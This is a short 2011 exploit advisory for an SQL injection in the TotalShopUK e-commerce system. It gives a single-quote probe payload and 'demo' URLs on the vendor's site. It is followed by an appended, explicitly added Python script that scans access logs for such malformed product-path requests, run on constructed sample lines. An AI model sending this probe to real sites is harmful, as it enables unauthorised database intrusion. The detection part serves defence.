# Exploit Title: TotalShopUK (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.totalshopuk.com
# Version: 1.7.2
# Tested on: All versions are vulnerable

ISSUE
SQL injection can be performed through the command input.

Exploit:
products/c/index.php/1'

Demo:
http://www.totalshopuk.com/products/c/index.php/1'
http://www.totalshopuk.com/products/c/laptops/1'

Thanks,
Eyüp CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr
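
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the `/products/c/...` paths whose trailing segment is not a plain number, including percent-encoded and double-encoded quotes. The Combined Log Format, the assumption that the trailing segment is a numeric ID, and all sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request part of an access-log line (assumption: Combined Log Format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Paths named in the advisory: /products/c/<index.php or category>/<id>
PRODUCT_RE = re.compile(r'^/products/c/[^/]+/(?P<id>.*)$')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so %2527 -> %27 -> ' is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (ip, target, status) for product requests whose trailing
    segment is non-empty and not purely numeric (assumed ID format)."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        p = PRODUCT_RE.match(path)
        if not p:
            continue
        segment = decode_fully(p.group("id"))
        if segment and not re.fullmatch(r"[0-9]+", segment):
            hits.append((m.group("ip"), m.group("target"),
                         int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Aug/2011:10:00:01 +0000] "GET /products/c/laptops/1 HTTP/1.1" 200 5120
198.51.100.7 - - [19/Aug/2011:10:00:05 +0000] "GET /products/c/index.php/1' HTTP/1.1" 500 312
198.51.100.7 - - [19/Aug/2011:10:00:09 +0000] "GET /products/c/laptops/1%2527 HTTP/1.1" 200 5120
192.0.2.10 - - [19/Aug/2011:10:00:12 +0000] "GET /products/c/laptops/ HTTP/1.1" 200 4096
192.0.2.10 - - [19/Aug/2011:10:00:15 +0000] "GET /images/logo.png HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    for ip, target, status in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

A 5xx status on a flagged request is worth triaging first, since it can indicate that the malformed segment reached the database layer.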